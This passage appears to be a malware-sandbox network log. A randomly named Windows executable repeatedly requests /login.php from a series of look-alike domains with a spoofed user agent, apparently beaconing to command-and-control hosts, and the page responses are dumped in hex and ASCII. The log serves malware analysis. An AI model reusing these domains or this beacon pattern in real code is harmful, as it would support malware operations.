                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.358055115 CET1236INData Raw: 3d 22 22 3b 69 2b 3d 22 3d 22 3b 76 61 72 20 73 3d 69 2e 6c 65 6e 67 74 68 3b 76 61 72 20 64 3d 6c 6f 63 61 74 69 6f 6e 3b 69 66 28 64 2e 68 61 73 68 2e 69 6e 64 65 78 4f 66 28 69 29 21 3d 2d 31 29 7b 77 3d 64 2e 68 61 73 68 2e 73 75 62 73 74 72
                                                                                                                                                                                                                  Data Ascii: ="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1){w=w.substr(0,w.in
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.358808041 CET1236INData Raw: 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b 69 66 28 75 2e
                                                                                                                                                                                                                  Data Ascii: rrentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.358824015 CET1236INData Raw: 69 6e 67 3e 30 29 7b 61 2e 73 72 63 3d 22 2f 2f 22 2b 77 69 6e 64 6f 77 2e 63 6d 70 5f 63 64 6e 2b 22 2f 64 65 6c 69 76 65 72 79 2f 65 6d 70 74 79 2e 68 74 6d 6c 22 7d 61 2e 6e 61 6d 65 3d 62 3b 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74
                                                                                                                                                                                                                  Data Ascii: ing>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("title","Intentionally hidden, please ignore");a.setAttribute("role","none");a.setAttribute("tabindex","-1");document.body.appendChild(a)}else{window.setTimeout(wi
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.359776974 CET1236INData Raw: 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29 29 7d 7d 7d 7d 7d 7d 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 70 70 5f 70 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 67 70 70 56 65 72 73 69 6f 6e 3a 22 31
                                                                                                                                                                                                                  Data Ascii: push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVersion:"1.0",cmpStatus:"stub",cmpDisplayStatus:"hidden",supportedAPIs:["tcfca","usnat","usca","usva","usco","usut","usct"],cmpId:31}};window.cmp_gppstub=function(){var a=
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.359791040 CET1236INData Raw: 20 63 3d 61 3f 4a 53 4f 4e 2e 70 61 72 73 65 28 64 2e 64 61 74 61 29 3a 64 2e 64 61 74 61 7d 63 61 74 63 68 28 66 29 7b 76 61 72 20 63 3d 6e 75 6c 6c 7d 69 66 28 74 79 70 65 6f 66 28 63 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 63 21 3d 3d 6e 75
                                                                                                                                                                                                                  Data Ascii: c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="object"&&c!==null&&"__cmpCall" in c){var b=c.__cmpCall;window.__cmp(b.command,b.parameter,function(h,g){var e={__cmpReturn:{returnValue:h,success:g,callId:b.callId}};d.source.p
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.360200882 CET1236INData Raw: 61 5d 3d 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 75 62 3b 77 69 6e 64 6f 77 5b 61 5d 2e 6d 73 67 48 61 6e 64 6c 65 72 3d 77 69 6e 64 6f 77 2e 63 6d 70 5f 6d 73 67 68 61 6e 64 6c 65 72 3b 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65
                                                                                                                                                                                                                  Data Ascii: a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandler;window.addEventListener("message",window.cmp_msghandler,false)}};window.cmp_setGppStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.360213995 CET1236INData Raw: 7a 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74
                                                                                                                                                                                                                  Data Ascii: z.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://galyqaz.com/sk-logabpstat
                                                                                                                                                                                                                  Nov 11, 2024 18:51:15.362662077 CET1236INData Raw: 2c 75 72 6c 28 22 68 74 74 70 3a 2f 2f 69 34 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 6d 6f 6e 74 73 65 72 72 61 74 2d 72 65 67 75 6c 61 72 2f 6d 6f 6e 74 73 65 72 72 61 74 2d 72 65 67 75 6c 61
                                                                                                                                                                                                                  Data Ascii: ,url("http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2") format("woff2"),url("http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf") format("truetype"),url("http://i4.cdn-image.co


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  88192.168.2.650244178.162.203.226805128C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.527920008 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyfus.com


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  89192.168.2.650243162.255.119.102805128C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:13.540594101 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gahyqah.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.030466080 CET303INHTTP/1.1 302 Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:13 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                  Content-Length: 55
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                                  X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                                  Server: namecheap-nginx
                                                                                                                                                                                                                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                  Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  90192.168.2.65024691.195.240.19805128C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.274794102 CET271OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: www.gahyqah.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.965106010 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:51:14 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                  transfer-encoding: chunked
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                  pragma: no-cache
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==
                                                                                                                                                                                                                  last-modified: Mon, 11 Nov 2024 17:51:14 GMT
                                                                                                                                                                                                                  x-cache-miss-from: parking-7596689c44-ptvfg
                                                                                                                                                                                                                  server: Parking/1.0
                                                                                                                                                                                                                  Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 67 35 72 6c 58 73 39 52 75 52 57 34 64 67 6c 71 51 35 4c 79 64 4a 45 74 74 53 54 56 42 73 66 70 54 67 35 59 62 54 62 54 67 78 51 79 43 78 4a 61 58 2f 34 77 57 7a 74 49 41 4f 75 52 6c 32 79 56 59 68 58 30 57 47 46 31 59 61 65 77 33 55 38 35 6e 47 49 35 75 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 67 61 68 79 71 61 68 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 67 61 68 79 71 61 68 20 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==><head><meta charset="utf-8"><title>gahyqah.com&nbsp;-&nbsp;gahyqah Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="gahyqah.com is your first and best source for all of the information youre looking for. From g
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.965285063 CET1236INData Raw: 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 67 61 68 79 71 61 68 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c
                                                                                                                                                                                                                  Data Ascii: eneral topics to more of what you would expect to find here, gahyqah.com has it all. We hope you find what you are searching for!"><link AEC rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sed
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.965297937 CET1236INData Raw: 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78
                                                                                                                                                                                                                  Data Ascii: {border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.965946913 CET1236INData Raw: 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 6e
                                                                                                                                                                                                                  Data Ascii: t-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.965959072 CET1236INData Raw: 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 20 61 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63
                                                                                                                                                                                                                  Data Ascii: 9494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.966801882 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 7b 70 6f 73 69
                                                                                                                                                                                                                  Data Ascii: ;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.966816902 CET1236INData Raw: 61 6c 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 2d 73 6d 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 63 6f 6c 6f 72 3a 23 66 66 66
                                                                                                                                                                                                                  Data Ascii: al}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:medium}.btn--secondary:hover{background-color:#727c83;borde
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.967444897 CET1236INData Raw: 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36 32 65 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 56 65 72 64 61 6e 61 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 73 61 6e 73 2d 73 65 72 69 66
                                                                                                                                                                                                                  Data Ascii: round-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:5%;padding-right:5%;padding-bottom:10px}.container-content{text
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.967456102 CET1236INData Raw: 28 2d 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 7a 2d 69 6e 64 65 78 3a 2d 31 3b 74 6f 70 3a 35 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d
                                                                                                                                                                                                                  Data Ascii: (-1);transform:scaleX(-1);z-index:-1;top:50px;position:inherit}.container-content--lp{min-height:720px}.container-content--rp{min-height:820px}.container-content--rp .container-content__right,.container-content--rp .container-content__left{bac
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.967467070 CET91INData Raw: 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e
                                                                                                                                                                                                                  Data Ascii: element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:underline
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.970809937 CET1236INData Raw: 35 37 36 0d 0a 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 68 6f 76 65 72 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74
                                                                                                                                                                                                                  Data Ascii: 576}.two-tier-ads-list__list-element-link:hover,.two-tier-ads-list__list-element-link:active,.two-tier-ads-list__list-element-link:focus{text-decoration:none}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#9fd801;fo


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                  91192.168.2.659192154.212.231.8280
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:16.555241108 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gadyniw.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:17.440397978 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:17 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 548
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                  92192.168.2.6591993.94.10.3480
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.303925037 CET353OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lymyxid.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347473|1731347428|13|3|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.733899117 CET334INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:19 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347479|1731347428|9|4|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  93192.168.2.659196199.191.50.83803328C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.304039001 CET281OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: galyqaz.com
                                                                                                                                                                                                                  Cookie: vsid=903vr478893028933998491
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.480437994 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:19 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Data Raw: 61 39 63 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: a9cc<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}i
